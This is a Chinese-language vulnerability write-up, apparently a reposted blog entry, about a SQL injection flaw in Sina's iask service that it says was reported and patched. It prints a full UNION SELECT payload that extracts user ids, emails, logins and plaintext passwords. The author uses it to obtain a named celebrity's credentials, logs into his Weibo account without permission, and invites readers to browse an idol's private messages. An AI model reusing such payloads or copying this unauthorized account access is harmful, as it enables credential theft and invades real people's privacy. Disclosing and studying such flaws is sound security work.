相關(guān)廠商：www.sina.com
作者：http://weibo.com/evilniang
發(fā)現(xiàn)時間：2012-1-1
漏洞類型：sql注射
危害等級：高
漏洞狀態(tài)：已修復(fù)

首先申明：該漏洞發(fā)現(xiàn)后本人已聯(lián)系新浪官方修復(fù)漏洞，目前漏洞以修補。文章內(nèi)容公布，僅供參考學(xué)習(xí)。

新浪網(wǎng)iask存在sql注射漏洞，利用漏洞可讀取iask數(shù)據(jù)庫內(nèi)內(nèi)容。包括明文密碼在內(nèi)的7000多W新浪用戶信息。

漏洞存在點: http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9

漏洞利用方式:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

這里我們通過構(gòu)造數(shù)據(jù)庫查詢語句獲得用戶uid=1303977362的uid、login、email、passwd等信息。通過修改字段還可以獲取其他信息 。

直接舉個例子比如我們通過新浪微波查找到劉謙，點擊他的個人資料。我們可以再瀏覽器地址欄處看到劉謙的uid(新浪用戶數(shù)字id)，此處uid為12715428867



直接構(gòu)造地址

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

直接獲得劉謙的賬號和密碼



這里賬號是luchenmagic密碼為2lo*****（保密）

嘗試登陸



成功登陸。劉謙微薄。這里你可以看看你的偶像的各種私信，聊天記錄之類的。

接下來的事情你可以自由發(fā)揮了。但是對于一個黑客而言，這只不過是一個開始而已（這里我并無惡意，拿劉謙的賬號來測試只是為了致敬，希望有機會能夠見證奇跡?。?br>
后話：

1.2011年年底的csdn、天涯等用戶庫的泄露只不過是冰山一腳。

2.新浪在csdn、天涯等用戶庫泄露后申稱新浪數(shù)據(jù)庫并沒有泄露，而且密碼是密文保存。這里要提出質(zhì)疑了，數(shù)據(jù)庫密碼明明是明文保存。至少iask中大部分用戶是明文保存密碼（部分用戶查不到密碼）。至于用戶信息是否泄露，這個不用說了把？

3.網(wǎng)絡(luò)泄密涉及到太多。不管是普通網(wǎng)民，還是明星名人，都被牽涉進來。這里測試不少明星，基本上都能通過微薄獲取他們的私人信息，甚至登陸他們的msn。（香港爆料雜志來找我把。開個玩笑。。。）

4.這個漏洞發(fā)現(xiàn)后我便通知了新浪官方,新浪在漏洞反饋和應(yīng)急處理這方面做的不夠快。收到漏洞后連給我回個郵件或者表示感謝都沒有。（我是無私奉獻白帽子，被活雷鋒了。）

5.祝新年快樂。
----------------------------------------------------
游俠補充：
　　剛從流量統(tǒng)計系統(tǒng)看到閱讀者暴增，原來是文中例子的主角劉謙先生在微博發(fā)了一條……好吧：這個事情，僅僅是劉謙先生的粉絲在做個安全測試，并無惡意。我們都喜歡劉先生的魔術(shù)。
　　謝謝劉謙先生給我博客打廣告……來西安我請你吃肉夾饃、羊肉泡饃——管飽！ :)
　　另：文章是新浪打了補丁之后作者才發(fā)出來的，看到本文的時候還想測試的話……晚了。嘿嘿